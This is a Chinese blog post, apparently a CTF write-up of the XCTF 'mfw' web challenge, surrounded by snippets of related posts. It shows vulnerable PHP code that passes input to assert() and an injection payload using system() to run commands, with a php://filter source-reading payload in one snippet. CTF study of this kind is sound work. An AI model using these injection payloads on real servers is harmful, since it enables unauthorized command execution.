攻防世界_web_mfw

最新推荐文章于 2024-05-26 12:46:39 发布
最新推荐文章于 2024-05-26 12:46:39 发布
阅读量245 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/105257776
版权


想到可能是git泄露,用hackgit扫描一下

得到源码

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

stripos() 查找字符串在另一字符串中第一次出现的位置(不区分大小写)
strpos通过查询‘…’ 在’$file’中第一次出现的位置来防止目录遍历
assert() 的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向 stderr 打印一条出错信息,然后通过调用 abort 来终止程序运行。

assert()函数会将读入的代码当做PHP代码来执行

  • 首先对strpos函数进行闭合,构造一下,page=’)

  • 可以把后面’, ‘…’) === false的给注释掉,构造page=’).system(“ls”);

  • assert("strpos(’’).system(“ls”);//…

传入?page=’.system(“ls”).’


得到flag

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 mfw
ChamZhiZe的博客
09-08 99
看到这里 猜测是.Git泄露 使用GitHack GitHack 需要在 python2 的环境下 运行。 python GitHack.py http://111.200.241.244:58685/ .git/ 发现了templates目录下的flag.php 查看,但是没有发现有用信息。 只能查看一下 index文件,发现源码: <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "hom.
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
NO.2-13
nigo134的博客
07-27 216
首先利用PHP伪协议读取index.php源代码 payload如下: php://filter/read=convert.base64-encode/resource=index 结果如图所示 源代码如下 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" )
php strpos失效的问题(明明包含但返回false
lvcal_sunday的博客
04-09 433
strpos对字符串中int类型的值支持不是很好。 比如: $a = 1; $b = 'aa1aa'; strpos($b,$a) =false; 但如果: $a = strval(1); $b = 'aa1aa'; strpos($b,$a) =true;
攻防世界-mfw
最新发布
weixin_64659753的博客
05-26 305
攻防世界-mfw
涨姿势的web
G0t1t的博客
07-20 857
文章目录写在前面php_rcemfw[强网杯 2019]随便注[护网杯 2018]easy_tornado[BJDCTF 2nd]fake google[BJDCTF2020]ZJCTF,不过如此[GYCTF2020]Blacklist[网鼎杯 2020 青龙组]AreUSerialz 写在前面 因为自己实在是太菜,每个题都参考了其他大佬的博客,只是为了整理一下学到的新知识方便日后翻阅,有部分摘录内容,所以会在每个题的最后都会附上reference。菜鸡报道,请多指教【抱拳】 php_rce 发现是一个T
攻防世界 mfw(Git源码泄露与命令执行漏洞)
Welcome To Myon'Blog !
06-01 2301
Git 源码泄露: 1、strpos() 函数 2、assert()函数 3、file_exists() 函数 4、die()函数 代码审计: 命令执行漏洞:
信息安全学习2
Liu__159的博客
02-04 340
在计算机安全和网络领域中,"payload"(有效载荷)指的是一段被发送到目标系统的数据或代码,旨在利用系统漏洞、执行特定操作或实现某些目的。需要注意的是,默认情况下,PHP 的断言功能是关闭的,即 assert() 函数不会生效。要使用 assert() 函数,需要在 php.ini 文件中设置 zend.assertions 的值。assert() 函数可以在开发过程中用于调试和验证条件,但在生产环境中建议关闭断言功能,以提高性能和安全性。函数是 PHP 中的一个函数,用于显示指定文件的源代码。
角度转换、坐标转换.zip_MFW_T4V_angle转换_坐标转换_弧度 坐标正反算
07-14
角度转弧度,弧度转角度, 坐标的正算,坐标的反算
调度组织_MFW.pptx
10-08
《调度组织在工业企业管理中的核心作用》 调度管理在工业企业的运营中扮演着至关重要的角色,它是企业高效运行的“指挥中心”、“信息中心”和“协调中心”。调度管理不仅涉及到对企业活动的指挥与运筹,而且在信息...
fluter_mfw:flutter高仿马蜂窝这个项目可以学到flutter中经常用到的组件
03-15
【标题】"fluter_mfw:flutter高仿马蜂窝这个项目可以学到flutter中经常用到的组件",意味着这是一个基于Flutter框架的项目,目的是模仿马蜂窝应用的界面和功能,以此来学习和掌握Flutter中常用的UI组件和编程技巧。...
mfw-bootstrap
04-02
"mfw-bootstrap"是一个基于HTML的引导样板项目,它的核心目标是为开发者提供一个快速启动Web页面设计和开发的基础框架。Bootstrap是由Twitter开发并开源的一个流行的前端开发框架,它简化了网页布局、响应式设计以及...
peach-pit-mfwMFW第一天示例
02-25
"peach-pit-mfw"似乎是一个项目或教程的名称,它以"MFW第一天示例"为主题,意在引导用户了解或学习某个特定的技术或流程。"MFW"可能是"Monday First Working"的缩写,暗示这是系列教程的第一天,通常会介绍基础概念...
python 正则匹配bytes
SingWeek
07-24 2274
网上找了半天都只有关于字符串的正则匹配,想到bytes的数据前面加了b,那么在匹配时是不是也要呢?直接上示例: import re data=b'blob 2199\x00<?php\n\nif (isset($_GET[\'page\'])) {\n\t$page = $_GET[\'page\'];\n} else {\n\t$page = "home";\n}\n\n$file = "templates/" . $page . ".php";\n\n// I heard \'..\' i...
XCTF-MFW Git泄露,命令执行漏洞 详解
AAAAAAAAAAAA66的博客
11-15 1278
最近自学了1个月的CTFweb题,参加比赛一道题都没做出来,有点自闭,但还是告诉自己要慢慢来,有意向打CTF的同学可以私信,一起学习。 目录 题目 解题过程 总结 题目 解题过程 工具 思路 过程 总结 ...
小宁百度了php一句话,赛宁平台web题解(一)
weixin_29967445的博客
04-12 2011
“我要的不是在寒冬中送我热咖啡的人,而是下雨天陪我一起吃冰的人,我要的不是守护我的人,而是和我一起冒险的人,我要的不是别人,是你”我不喜欢永远,因为少了一个人 永远就不成立了 下辈子听起来还不错 像是一个浪漫的约定。下周国赛…我也不想学习,也不想刷题,可是,没女朋友你还不滚去学习???初级simple_php打开题目,显示代码如下:123456789101112131415蚁剑连接,发现flag...
攻防世界 mfw git泄露构造闭合
m0_64180167的博客
10-07 297
这题也挺有想法 第一次确实没有想到。然后我们看index.php代码。我们githack 泄露一下。首先我们可以扫出 git。就是替换为cat即可。
攻防世界WEB练习-mfw
墨鱼菜鸡
09-10 255
目录 题目场景 查看about 查看源码 查看.git GitHack扫描 查看生成的index.php 分析代码 找到flag 题目场景 查看about 查看源码 在源码第29行发现了线索 查看.git 怀疑是git代码泄露 GitHack扫描 查看生成的index.php <?php ...
攻防世界-web-mfw
wuh2333的博客
06-28 600
攻防世界mfw
度为2的有序树就是二叉树
09-01
- *3* [第六章 树和二叉树习题1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值